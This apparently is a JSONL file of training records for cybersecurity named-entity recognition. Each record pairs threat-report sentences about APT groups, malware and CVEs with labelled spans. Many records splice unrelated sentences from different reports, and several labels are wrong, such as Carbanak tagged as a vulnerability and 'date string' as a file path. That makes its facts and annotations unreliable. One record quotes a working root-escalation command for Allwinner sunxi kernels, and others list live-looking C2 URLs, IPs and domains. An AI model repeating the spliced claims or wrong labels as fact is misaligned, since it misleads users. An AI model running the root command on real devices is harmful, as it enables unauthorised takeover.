{"text": "We do not have any strong ties to connect the current attacks exploiting this vulnerability in SharePoint with the Emissary Panda attacks carried out in April .", "spans": {"TOOL: SharePoint": [[95, 105]], "THREAT_ACTOR: Emissary Panda": [[115, 129]]}, "info": {"id": "cyberner_stix_train_001378", "source": "cyberner_stix_train"}}
{"text": "If the threat reappears on the device after the first installation , it means that the malware managed to install the persistency module in the System directory . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system . MuddyWater is an Iranian high-profile threat actor that 's been seen active since 2017 .", "spans": {"VULNERABILITY: Carbanak": [[163, 171]], "THREAT_ACTOR: MuddyWater": [[308, 318]]}, "info": {"id": "cyberner_stix_train_001379", "source": "cyberner_stix_train"}}
{"text": "Much like the MiniDuke expose in February 2013 , the Dukes again appeared to prioritize continuing operations over staying hidden .", "spans": {"MALWARE: MiniDuke": [[14, 22]], "THREAT_ACTOR: Dukes": [[53, 58]]}, "info": {"id": "cyberner_stix_train_001380", "source": "cyberner_stix_train"}}
{"text": "Figure 5 . Instead , sensitive KHNP documents were leaked by the actors as part of an effort to exaggerate the access they had and embarrass the South Korean Government , a technique we assess North Korea would turn to again in order to instill fear and/or meet domestic propaganda aims . The campaign of April 2017 used pertinent documents containing potentially sensitive data .", "spans": {"MALWARE: KHNP documents": [[31, 45]], "THREAT_ACTOR: actors": [[65, 71]], "ORGANIZATION: South Korean Government": [[145, 168]]}, "info": {"id": "cyberner_stix_train_001381", "source": "cyberner_stix_train"}}
{"text": "These steps were taken over a 13-day period , but only on specific days .", "spans": {}, "info": {"id": "cyberner_stix_train_001382", "source": "cyberner_stix_train"}}
{"text": "Their publicly advertised products include CCTV management systems , surveillance drones , face and license plate recognition systems . The attackers actively sent out malicious documents and maintained several IP addresses for command and control . The backdoor has the following capabilities : Organizations can have hundreds , thousands or more of unremediated vulnerabilities that could open the door for an attacker .", "spans": {"VULNERABILITY: unremediated vulnerabilities": [[351, 379]], "THREAT_ACTOR: attacker": [[412, 420]]}, "info": {"id": "cyberner_stix_train_001383", "source": "cyberner_stix_train"}}
{"text": "The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier .", "spans": {"THREAT_ACTOR: Emissary Panda": [[4, 18]], "TOOL: China Chopper": [[43, 56]], "VULNERABILITY: CVE-2019-0604": [[264, 277]], "FILEPATH: date string": [[315, 326]], "FILEPATH: date codes": [[344, 354]], "MALWARE: Bookworm": [[400, 408]]}, "info": {"id": "cyberner_stix_train_001384", "source": "cyberner_stix_train"}}
{"text": "icons Figure 11 : Icons used to pose as famous apps . In addition to file-based protection , customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . APT17 : Deputy Dog .", "spans": {"ORGANIZATION: DeepSight": [[110, 119]], "THREAT_ACTOR: Buckeye": [[215, 222]], "THREAT_ACTOR: APT17": [[300, 305]], "THREAT_ACTOR: Deputy Dog": [[308, 318]]}, "info": {"id": "cyberner_stix_train_001385", "source": "cyberner_stix_train"}}
{"text": "In at least one case however , the email instead contained a link to a zip archive file named “ Office Monkeys LOL Video.zip ” , which was hosted on the DropBox cloud storage service .", "spans": {"TOOL: email": [[35, 40]], "TOOL: zip": [[71, 74]], "FILEPATH: Office Monkeys LOL Video.zip": [[96, 124]], "TOOL: DropBox": [[153, 160]]}, "info": {"id": "cyberner_stix_train_001386", "source": "cyberner_stix_train"}}
{"text": "Sofacy , one of the most active APT we monitor , continues to spearphish their way into targets , reportedly widely phishes for credentials , and infrequently participates in server side activity ( including host compromise with BeEF deployment , for example ) .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "TOOL: BeEF": [[229, 233]]}, "info": {"id": "cyberner_stix_train_001387", "source": "cyberner_stix_train"}}
{"text": "FormBook is a browser form stealer/keylogger that is under active development . Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) .", "spans": {"TOOL: FormBook": [[0, 8]], "TOOL: stealer/keylogger": [[27, 44]], "MALWARE: .doc files": [[134, 144]], "FILEPATH: RTF documents": [[165, 178]], "VULNERABILITY: exploit": [[195, 202]], "VULNERABILITY: CVE-2017-8570": [[203, 216]], "TOOL: Composite Moniker": [[219, 236]]}, "info": {"id": "cyberner_stix_train_001388", "source": "cyberner_stix_train"}}
{"text": "To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor .", "spans": {"THREAT_ACTOR: cyber criminals": [[31, 46]], "TOOL: spearphishing emails": [[51, 71]], "TOOL: attachments:": [[94, 106]], "TOOL: documents": [[117, 126], [209, 218]], "VULNERABILITY: CVE-2017-11882": [[189, 203]], "FILEPATH: Bemstour": [[243, 251]], "MALWARE: DoublePulsar backdoor": [[305, 326]]}, "info": {"id": "cyberner_stix_train_001389", "source": "cyberner_stix_train"}}
{"text": "Android users warned of malware attack spreading via SMS FEB 16 , 2016 Security researchers are warning owners of Android smartphones about a new malware attack , spreading via SMS text messages . The group , which we have given the name Gallmaker , has been operating since at least December 2017 , with its most recent activity observed in June 2018 . the callback is executed just once in the implementation . The campaign was carried out in late 2020 , but it was detected , analyzed , and published in late March 2021 .", "spans": {"SYSTEM: Android": [[0, 7], [114, 121]], "THREAT_ACTOR: group": [[201, 206]], "THREAT_ACTOR: Gallmaker": [[238, 247]]}, "info": {"id": "cyberner_stix_train_001390", "source": "cyberner_stix_train"}}
{"text": "FakeSpy Masquerades as Postal Service Apps Around the World July 1 , 2020 KEY FINDINGS The Cybereason Nocturnus team is investigating a new campaign involving FakeSpy , an Android mobile malware that emerged around October 2017 . Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX . Gallmaker 's activity appears to be highly targeted , with its victims all related to government , military , or defense sectors .", "spans": {"MALWARE: FakeSpy": [[0, 7], [159, 166]], "ORGANIZATION: Cybereason Nocturnus": [[91, 111]], "SYSTEM: Android": [[172, 179]], "TOOL: Komplex": [[230, 237]], "THREAT_ACTOR: APT28": [[274, 279]], "THREAT_ACTOR: Gallmaker": [[351, 360]], "ORGANIZATION: government": [[437, 447]], "ORGANIZATION: military": [[450, 458]], "ORGANIZATION: defense sectors": [[464, 479]]}, "info": {"id": "cyberner_stix_train_001391", "source": "cyberner_stix_train"}}
{"text": "NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird . The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People 's Republics .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[0, 9]], "THREAT_ACTOR: activity group": [[16, 30]], "ORGANIZATION: Microsoft": [[83, 92]], "TOOL: Wingbird": [[96, 104]], "ORGANIZATION: anti-government separatists": [[219, 246]]}, "info": {"id": "cyberner_stix_train_001392", "source": "cyberner_stix_train"}}
{"text": "The threat actors demonstrated the ability to adapt when reentering a network after an eviction , overcoming technical barriers constructed by network defenders .", "spans": {}, "info": {"id": "cyberner_stix_train_001393", "source": "cyberner_stix_train"}}
{"text": "We recently observed Hancitor attacks against some of our FireEye Exploit Guard customers . In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks .", "spans": {"THREAT_ACTOR: Hancitor": [[21, 29]], "ORGANIZATION: FireEye": [[58, 65]], "ORGANIZATION: telecoms companies": [[185, 203]], "ORGANIZATION: customers": [[229, 238]]}, "info": {"id": "cyberner_stix_train_001395", "source": "cyberner_stix_train"}}
{"text": "These types of apps tend to store their data in databases and , as an example , HenBox accesses Voxer ’ s database from the file “ /data/data/com.rebelvox.voxer/databases/rv.db ” . HIGHNOON , one of the main code families observed being used by APT41 , was also used by APT17 in 2015 to target semiconductor and chemical manufacturers . Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows .", "spans": {"MALWARE: HenBox": [[80, 86]], "TOOL: HIGHNOON": [[181, 189]], "THREAT_ACTOR: APT41": [[245, 250]], "THREAT_ACTOR: APT17": [[270, 275]], "ORGANIZATION: semiconductor": [[294, 307]], "ORGANIZATION: chemical manufacturers": [[312, 334]], "MALWARE: Komplex": [[337, 344]], "THREAT_ACTOR: Sofacy": [[427, 433], [461, 467]], "MALWARE: Carberp": [[440, 447]], "SYSTEM: Windows": [[525, 532]]}, "info": {"id": "cyberner_stix_train_001396", "source": "cyberner_stix_train"}}
{"text": "Figure 10 . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Filename: winnit.exe .", "spans": {"MALWARE: flare-qdb": [[30, 39]], "FILEPATH: winnit.exe": [[108, 118]]}, "info": {"id": "cyberner_stix_train_001397", "source": "cyberner_stix_train"}}
{"text": "cd78cg210xy0.com copsoiteess.com farmatefc93.org firstclinsop.com holebrhuhh3.com holebrhuhh45.com karambga3j.net le22999a.pw leboncoin-bk.top leboncoin-buy.pw leboncoin-cz.info leboncoin-f.pw leboncoin-jp.info leboncoin-kp.top leboncoin-ny.info leboncoin-ql.top leboncoin-tr.info Talos published its analysis of the BlackWater campaign , related to MuddyWater group . The malware internally uses the following files : solhelp.ocx sultry.ocx helpsol.ocx psltre.ocx screentmp.tmp (log file of the keylogger) spadmgr.ocx apsmgrd.ocx wpg.db .", "spans": {"ORGANIZATION: Talos": [[281, 286]], "THREAT_ACTOR: MuddyWater": [[350, 360]], "FILEPATH: solhelp.ocx": [[419, 430]], "FILEPATH: sultry.ocx": [[431, 441]], "FILEPATH: helpsol.ocx": [[442, 453]], "FILEPATH: psltre.ocx": [[454, 464]], "FILEPATH: screentmp.tmp": [[465, 478]], "FILEPATH: spadmgr.ocx": [[507, 518]], "FILEPATH: apsmgrd.ocx": [[519, 530]], "FILEPATH: wpg.db": [[531, 537]]}, "info": {"id": "cyberner_stix_train_001398", "source": "cyberner_stix_train"}}
{"text": "We observed these samples deployed only against Hebrew-speaking targets .", "spans": {}, "info": {"id": "cyberner_stix_train_001399", "source": "cyberner_stix_train"}}
{"text": "Within a year APT40 was observed masquerading as a UUV manufacturer , and targeting universities engaged in naval research . The actors successfully compromised a host of an Saudi government institutions on January 17 , 2016 , and maintained access for at least two weeks .", "spans": {"THREAT_ACTOR: APT40": [[14, 19]], "ORGANIZATION: universities": [[84, 96]], "ORGANIZATION: government institutions": [[180, 203]]}, "info": {"id": "cyberner_stix_train_001400", "source": "cyberner_stix_train"}}
{"text": "For exploiting this issue , any process running with any UID can be converted into root easily by simply using the following command : echo \" rootmydevice '' > /proc/sunxi_debug/sunxi_debug The Linux 3.4-sunxi kernel was originally designed to support the Android operating system on Allwinner ARM for tablets , but later it was used to port Linux to many Allwinner processors on boards like Banana Pi micro-PCs , Orange Pi , and other devices . The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server ( systsm.webServer/httplogging ) and then delete existing logs from the system ( see Figure 4 ) . Outlaw : http://www.minpop.com/sk12pack/idents.php Command and control . The file collected system information , and then invoked a WMI instance in the rootsecuritycenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": {"SYSTEM: Android": [[256, 263]], "ORGANIZATION: Allwinner": [[284, 293], [356, 365]], "SYSTEM: ARM": [[294, 297]], "SYSTEM: Linux": [[342, 347]], "SYSTEM: Banana Pi micro-PCs": [[392, 411]], "SYSTEM: Orange Pi": [[414, 423]], "THREAT_ACTOR: Outlaw": [[662, 668]], "URL: http://www.minpop.com/sk12pack/idents.php": [[671, 712]], "TOOL: Command and control": [[713, 732]]}, "info": {"id": "cyberner_stix_train_001401", "source": "cyberner_stix_train"}}
{"text": "It ’ s not a definite correlation , but Bouncing Golf also seems to have a connection with Domestic Kitten due to similarities we found in their code . Attacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks . During the investigation related to the GRIFFON infrastructure , we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company . Since as - a - service or commodity malware can include all types of malware , it can be tough to provide specific advice for detection and prevention .", "spans": {"MALWARE: Bouncing Golf": [[40, 53]], "MALWARE: Domestic Kitten": [[91, 106]], "THREAT_ACTOR: ScarCruft": [[265, 274]], "MALWARE: GRIFFON": [[343, 350], [430, 437]], "TOOL: WHOIS": [[407, 412]], "TOOL: C2": [[438, 440]], "MALWARE: commodity malware": [[503, 520]]}, "info": {"id": "cyberner_stix_train_001402", "source": "cyberner_stix_train"}}
{"text": "This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild . This matches with known Tactics , Techniques , and Procedures ( TTPs ) for Tropic Trooper , targeting both government institutions and also the energy industry in Taiwan .", "spans": {"VULNERABILITY: vulnerability": [[5, 18]], "ORGANIZATION: FireEye": [[37, 44]], "THREAT_ACTOR: Tropic Trooper": [[213, 227]], "ORGANIZATION: government institutions": [[245, 268]], "ORGANIZATION: energy industry": [[282, 297]]}, "info": {"id": "cyberner_stix_train_001403", "source": "cyberner_stix_train"}}
{"text": "In 2016 , the threat actors conducted a strategic web compromise ( SWC ) on the website of an international industry organization that affected aerospace , academic , media , technology , government , and utilities organizations around the world . The target domain ’s visitors will be redirected into an e-banking login page that looks and acts normally , but is located on dark web sites .", "spans": {"TOOL: SWC": [[67, 70]], "ORGANIZATION: international industry organization": [[94, 129]], "ORGANIZATION: aerospace": [[144, 153]], "ORGANIZATION: academic": [[156, 164]], "ORGANIZATION: media": [[167, 172]], "ORGANIZATION: technology": [[175, 185]], "ORGANIZATION: government": [[188, 198]], "ORGANIZATION: utilities organizations": [[205, 228]]}, "info": {"id": "cyberner_stix_train_001404", "source": "cyberner_stix_train"}}
{"text": "One of these webshells is the open source AntSword webshell freely available on Github , which is remarkably similar to the infamous China Chopper webshell .", "spans": {"TOOL: AntSword": [[42, 50]], "TOOL: Github": [[80, 86]], "TOOL: Chopper": [[139, 146]]}, "info": {"id": "cyberner_stix_train_001405", "source": "cyberner_stix_train"}}
{"text": "Based on received commands , it can either download malicious apps or switch the C & C Twitter account to another one . Between July 2015 and February 2016 , Scattered Canary’s primary focus seemed to be mass harvesting general credentials using a Google Docs phishing page . Today we'd like to share some of our findings , and add something new to what 's currently common knowledge about Lazarus Group activities , and their connection to the much talked about February 2016 incident , when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank .", "spans": {"SYSTEM: Twitter": [[87, 94]], "THREAT_ACTOR: Scattered Canary’s": [[158, 176]], "THREAT_ACTOR: attacker": [[504, 512]], "ORGANIZATION: Bangladesh Central Bank": [[553, 576]]}, "info": {"id": "cyberner_stix_train_001406", "source": "cyberner_stix_train"}}
{"text": "This is a pseudo-unique ID for each machine , based on install date taken from the registry , volume serial number , OS version and service pack , Processor architecture , and computer name .", "spans": {}, "info": {"id": "cyberner_stix_train_001407", "source": "cyberner_stix_train"}}
{"text": "The results also revealed indications that PsExec , a popular system administration tool for executing commands on remote systems , was run against several target hosts to spawn shells on them .", "spans": {"TOOL: PsExec": [[43, 49]]}, "info": {"id": "cyberner_stix_train_001408", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : 69.87.223.26:8080/p .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "DOMAIN: 69.87.223.26:8080/p": [[11, 30]]}, "info": {"id": "cyberner_stix_train_001409", "source": "cyberner_stix_train"}}
{"text": "Both components contain an identical VBA macro code as shown above , each containing two different embedded payloads : one is an executable binary file and the other is a .docm file . attachedTemplate.dotm dropped the following :", "spans": {"TOOL: VBA": [[37, 40]], "FILEPATH: .docm": [[171, 176]], "FILEPATH: attachedTemplate.dotm": [[184, 205]]}, "info": {"id": "cyberner_stix_train_001410", "source": "cyberner_stix_train"}}
{"text": "ESET researchers have found that Turla , the notorious state-sponsored cyberespionage group , has added a fresh weapon to its arsenal that is being used in new campaigns targeting embassies and consulates in the post-Soviet states . Many groups leverage the regsvr32.exe application whitelisting bypass , including APT19 in their 2017 campaign against law firms .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: Turla": [[33, 38]], "FILEPATH: regsvr32.exe": [[258, 270]], "THREAT_ACTOR: APT19": [[315, 320]], "ORGANIZATION: law firms": [[352, 361]]}, "info": {"id": "cyberner_stix_train_001411", "source": "cyberner_stix_train"}}
{"text": "The Campaign achieved exponential growth from June to December 2018 with the infection number staying stable into early 2019 . The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 . Dexphot : 22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3 . The following contains specific detection names that provide an indicator of Exchange Server exploitation or post - exploitation activities we associated with these threat actors .", "spans": {"MALWARE: CONFUCIUS_A": [[156, 167]], "TOOL: SNEEPY": [[286, 292]], "TOOL: ByeByeShell": [[299, 310]], "ORGANIZATION: Rapid7": [[331, 337]], "MALWARE: Dexphot": [[348, 355]], "FILEPATH: 22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3": [[358, 422]], "SYSTEM: Exchange Server": [[502, 517]]}, "info": {"id": "cyberner_stix_train_001412", "source": "cyberner_stix_train"}}
{"text": "wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK .", "spans": {"MALWARE: wuaupdt.exe": [[0, 11]], "TOOL: CMD": [[17, 20]], "FILEPATH: KHRAT": [[90, 95]], "MALWARE: backdoor trojan": [[101, 116]], "THREAT_ACTOR: DragonOK": [[181, 189]]}, "info": {"id": "cyberner_stix_train_001413", "source": "cyberner_stix_train"}}
{"text": "Like the “ MiniDuke loader ” , these “ John Kasai ” domains also provide a common thread tying together much of the tools and infrastructure of the Dukes .", "spans": {"MALWARE: MiniDuke": [[11, 19]], "THREAT_ACTOR: Dukes": [[148, 153]]}, "info": {"id": "cyberner_stix_train_001414", "source": "cyberner_stix_train"}}
{"text": "The malware takes these steps : Check if the system master boot record ( MBR ) contains an infection marker ( 0xD289C989C089 8-bytes value at offset 0x2C ) , and , if so , terminate itself Check again if the process is attached to a debugger ( using the techniques described previously ) Read , decrypt , and map the stage 5 malware ( written in the previous stage in msvcr90.dll ) Open winlogon.exe process Load user32.dll system library and read the KernelCallbackTable After learning of an active attack incident from the Rocket Kitten group on a customer network , Check Point researchers decided to actively join the investigation . The shellcode starts in a fairly standard way – by walking the list of loaded modules in order to find the base of kernel32.dll library . It is accessed using a path confusion exploit , CVE-2022 - 41040 , allowing the attacker to reach the backend for arbitrary URLs .", "spans": {"THREAT_ACTOR: Rocket Kitten group": [[525, 544]], "ORGANIZATION: Check Point": [[569, 580]], "FILEPATH: kernel32.dll": [[753, 765]], "VULNERABILITY: CVE-2022 - 41040": [[824, 840]]}, "info": {"id": "cyberner_stix_train_001415", "source": "cyberner_stix_train"}}
{"text": "To date , Unit 42 has seen four of the seven ( the first three in the list below , along with cdncool [ . APT41 has been observed creating a RAR archive of targeted files for exfiltration . This assertion of time zone is also supported by timestamps found in many GeminiDuke samples , which similarly suggest the group work in the Moscow Standard TIME timezone , as further detailed in the section on the technical analysis of GeminiDuke .", "spans": {"THREAT_ACTOR: APT41": [[106, 111]], "MALWARE: GeminiDuke samples": [[264, 282]], "MALWARE: GeminiDuke": [[427, 437]]}, "info": {"id": "cyberner_stix_train_001416", "source": "cyberner_stix_train"}}
{"text": "In this report we continue our research of the actor 's operations with a specific focus on a selection of custom information technology ( IT ) tools and tactics the threat actor leveraged during the early stages of the targeted attack lifecycle . All of the traffic will be hijacked into the first proxy ( port 5555 ) with the victim ’s external IP address as parameter .", "spans": {"ORGANIZATION: information technology": [[114, 136]], "ORGANIZATION: IT": [[139, 141]]}, "info": {"id": "cyberner_stix_train_001417", "source": "cyberner_stix_train"}}
{"text": "That post included download links for a slew of NSA hacking tools and exploits , many of which could be used to break into hardware firewall appliances , and in turn , corporate or government networks . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": {"ORGANIZATION: NSA": [[48, 51]], "ORGANIZATION: civil society": [[272, 285]], "ORGANIZATION: human rights organizations": [[290, 316]], "ORGANIZATION: diaspora": [[446, 454]]}, "info": {"id": "cyberner_stix_train_001418", "source": "cyberner_stix_train"}}
{"text": "Similar to previous campaigns , the JAR was directly attached to emails and used file names such as Order_2018.jar . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" .", "spans": {"MALWARE: JAR": [[36, 39]], "TOOL: Order_2018.jar": [[100, 114]], "ORGANIZATION: Microsoft": [[150, 159]], "THREAT_ACTOR: Barium": [[211, 217]], "FILEPATH: Win32/ShadowPad.A": [[256, 273]]}, "info": {"id": "cyberner_stix_train_001419", "source": "cyberner_stix_train"}}
{"text": "Once the targeted website is launched , the malware uses the JavaScript code to locate and click on banners from the Google ads infrastructure . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security ( DHS ) . This function implements the initial handshake which consists of exchanging 16 bytes , 0x00001985 and 0x00000425, Iranian officials state the delegations agreed that good progress was made during the seventh round that ended 10 days earlier , and there is now a suitable framework to take the talks forward .", "spans": {"SYSTEM: Google ads": [[117, 127]], "ORGANIZATION: Department of Homeland Security": [[217, 248]], "ORGANIZATION: DHS": [[251, 254]], "ORGANIZATION: Iranian officials": [[373, 390]]}, "info": {"id": "cyberner_stix_train_001420", "source": "cyberner_stix_train"}}
{"text": "Late last year , after receiving a list of suspicious package names from Lookout , we discovered that a few dozen Android devices may have installed an application related to Pegasus , which we named Chrysaor . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft . APT33 : 192.119.15.42 [REDACTED].ddns.net . With an understanding of the basic motivations that drive cyberattacks organizations can better identify where their own assets may be at risk and thereby more efficiently and effectively address identified risks .", "spans": {"ORGANIZATION: Lookout": [[73, 80]], "SYSTEM: Android": [[114, 121]], "MALWARE: Pegasus": [[175, 182]], "MALWARE: Chrysaor": [[200, 208]], "THREAT_ACTOR: Leafminer": [[211, 220]], "VULNERABILITY: SMB vulnerabilities": [[335, 354]], "ORGANIZATION: Microsoft": [[368, 377]], "THREAT_ACTOR: APT33": [[380, 385]], "IP_ADDRESS: 192.119.15.42": [[388, 401]], "DOMAIN: [REDACTED].ddns.net": [[402, 421]]}, "info": {"id": "cyberner_stix_train_001421", "source": "cyberner_stix_train"}}
{"text": "Additionally , during a period of several days , our infected test device was never remotely disinfected by the operators . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel . Based on our analysis and the behaviour of the executed malware , the correct interpretation is the first one based on the oldest version of uncompyle6 . The vendor declined to release an update within the 90 - day period as outlined in Cisco ’s vulnerability disclosure policy .", "spans": {"THREAT_ACTOR: HELIX KITTEN actors": [[139, 158]], "ORGANIZATION: personnel": [[294, 303]], "TOOL: uncompyle6": [[447, 457]], "ORGANIZATION: Cisco ’s": [[543, 551]]}, "info": {"id": "cyberner_stix_train_001422", "source": "cyberner_stix_train"}}
{"text": "The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” . Back in February , we noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia .", "spans": {"MALWARE: JavaScript": [[4, 14]], "THREAT_ACTOR: Patchwork": [[286, 295]], "THREAT_ACTOR: Confucius groups": [[300, 316]]}, "info": {"id": "cyberner_stix_train_001423", "source": "cyberner_stix_train"}}
{"text": "Checking for antivirus and other security products using WMI .", "spans": {"TOOL: WMI": [[57, 60]]}, "info": {"id": "cyberner_stix_train_001424", "source": "cyberner_stix_train"}}
{"text": "The campaign corresponds with a period of heightened tension in Gaza .", "spans": {}, "info": {"id": "cyberner_stix_train_001425", "source": "cyberner_stix_train"}}
{"text": "Figure 9 : Prompt for application permissions upon installation Figures 10 and 11 show the other permission screens for the app : Figure 10 Figure 10 : Part 1 of the permission screen for the app Figure 11 : Part 2 of the permission screen for the app Once installed the app will place a legitimate looking icon on the phone ’ s home screen , again using branding stolen from the bank . Many of these infection efforts are pulled together by the CIA's Automated Implant Branch (AIB) , which has developed several attack systems for automated infestation and control of CIA malware , such as Assassin and Medusa . Deep Panda : Shell Crew , WebMasters , KungFu Kittens , PinkPanther , Black Vine .", "spans": {"THREAT_ACTOR: CIA's": [[446, 451]], "TOOL: Assassin": [[591, 599]], "TOOL: Medusa": [[604, 610]], "THREAT_ACTOR: Deep Panda": [[613, 623]], "THREAT_ACTOR: Shell Crew": [[626, 636]], "THREAT_ACTOR: WebMasters": [[639, 649]], "THREAT_ACTOR: KungFu Kittens": [[652, 666]], "THREAT_ACTOR: PinkPanther": [[669, 680]], "THREAT_ACTOR: Black Vine": [[683, 693]]}, "info": {"id": "cyberner_stix_train_001426", "source": "cyberner_stix_train"}}
{"text": "FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic , and trade policy . Seeking to tease out any possible links between Operation Aurora , VOHO , Operation DeputyDog , and Ephemeral Hydra , we began with Symantec 's Hidden Lynx report as our foundation .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: admin@338": [[28, 37]], "THREAT_ACTOR: group": [[69, 74]], "ORGANIZATION: financial": [[122, 131]], "ORGANIZATION: economic": [[134, 142]], "ORGANIZATION: trade policy": [[149, 161]], "ORGANIZATION: Symantec": [[296, 304]]}, "info": {"id": "cyberner_stix_train_001427", "source": "cyberner_stix_train"}}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]], "TOOL: Word": [[205, 209]], "VULNERABILITY: CVE-2017-11882": [[248, 262]], "FILEPATH: 'NavShExt.dll'": [[329, 343]], "FILEPATH: iexplore.exe": [[374, 386]]}, "info": {"id": "cyberner_stix_train_001428", "source": "cyberner_stix_train"}}
{"text": "It is likely that BRONZE PRESIDENT is sponsored or at least tolerated by the PRC government .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[18, 34]], "ORGANIZATION: PRC": [[77, 80]]}, "info": {"id": "cyberner_stix_train_001429", "source": "cyberner_stix_train"}}
{"text": "Also , DealersChoice requires multiple interactions with an active C2 server to successfully exploit an end system .", "spans": {"TOOL: DealersChoice": [[7, 20]], "TOOL: C2": [[67, 69]]}, "info": {"id": "cyberner_stix_train_001430", "source": "cyberner_stix_train"}}
{"text": "This adversary displays a particular focus on targeting entities in the Ukraine and is believed to be behind the Ukrainian energy sector attacks that caused widespread power outages in late 2015 . The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"THREAT_ACTOR: attackers": [[201, 210]], "MALWARE: Poison Ivy RAT": [[228, 242]], "MALWARE: WinHTTPHelper": [[247, 260]], "MALWARE: malware": [[261, 268]], "ORGANIZATION: government officials": [[300, 320]]}, "info": {"id": "cyberner_stix_train_001431", "source": "cyberner_stix_train"}}
{"text": "We also describe apps that we think are coming from the same author or a group of authors . In late September 2015 Mofang used the website of Myanmara 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar . The lure documents also used the Japanese calendar , as indicated by the 27th year in the Heisei period . The file , matches signatures for the tried - and - true China Chopper .", "spans": {"THREAT_ACTOR: the tried - and - true China Chopper": [[387, 423]]}, "info": {"id": "cyberner_stix_train_001432", "source": "cyberner_stix_train"}}
{"text": "KSN visibility and detections suggests a shift from their early 2017 high volume NATO spearphish targeting towards the middle east and Central Asia , and finally moving their focus further east into late 2017 .", "spans": {"ORGANIZATION: KSN": [[0, 3]], "ORGANIZATION: NATO": [[81, 85]]}, "info": {"id": "cyberner_stix_train_001433", "source": "cyberner_stix_train"}}
{"text": "The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 . Instead , Lead often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: EternalBlue exploit": [[168, 187]], "THREAT_ACTOR: WannaCry": [[200, 208]], "TOOL: emails": [[260, 266]], "MALWARE: Winnti installer": [[269, 285]]}, "info": {"id": "cyberner_stix_train_001434", "source": "cyberner_stix_train"}}
{"text": "Again , we control the content of the file , the size and the path and filename .", "spans": {}, "info": {"id": "cyberner_stix_train_001435", "source": "cyberner_stix_train"}}
